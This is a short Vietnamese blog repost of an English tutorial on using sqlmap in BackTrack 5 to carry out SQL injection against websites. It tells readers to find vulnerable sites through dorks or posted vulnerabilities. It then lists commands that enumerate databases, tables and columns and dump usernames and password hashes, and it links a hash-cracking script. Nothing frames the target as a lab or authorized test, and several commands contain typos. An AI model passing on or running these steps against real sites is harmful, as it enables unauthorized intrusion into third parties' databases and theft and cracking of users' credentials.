Hướng dẫn sử dụng SqlMap Backtrack 5

Hi, in this tutorial, I’ll be showing you a simple SQL Injection using BackTrack 5.

Quote:
[dbname] = Database name; [tbname] = Table name; [cmname] = Column name.

1. Open up sqlmap
This image has been resized.Click to view original image

2. One we load the terminal, we wanna find a vunerable site.
Use any dork or check any posted vulns 3. Now, it’s time for the codes
Quote:
./sqlmap.py -u website.com/index.php?id=? --dbs
With this command, you’ll be able to extract the databases.
Looks like this:


3. Once we have the DBS, it’s time to get the tables.
Quote:
./sqlmap website.php/index.php?id=? -D [dbname] --tables
4. After we get the tables which looks like this:

We need to get the columns.
Now, we need to write:
Quote:
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] --columns
5. Once we get the columns
This image has been resized.Click to view original image

We need to dump the files.
Quote:
.sqlmap.py -u website.com/index.php?id=? -D [dbname] -T [tbname] -C [cbname] --dump
Example .sqlmap.py -u website.com/index.php?id=? -D information_shema -T users -C username --dump
6. After we do this, we will get encrypted password.
How to decrypt!?
You can decrypt online, or using the aforementioned hash.py.
How to use Hash.py!?
Download link for Hash.py
http://uploading.com/ee6e71ed/hash-py
1. Move it to /root
2. Open up your BT5 Terminal
3. Locate your file, in our case /root/hash.py
Quote:
/root/hash.py
We have Online & Offline attack methods.
If you wanna use the offline method, you need a wordlist.

Chú Ý:

Coppy phải ghi rõ nguồn Dương-UG Blog's
 

1 nhận xét:

Copyright © Dương-UG Blog's - Nguyễn Bình Dương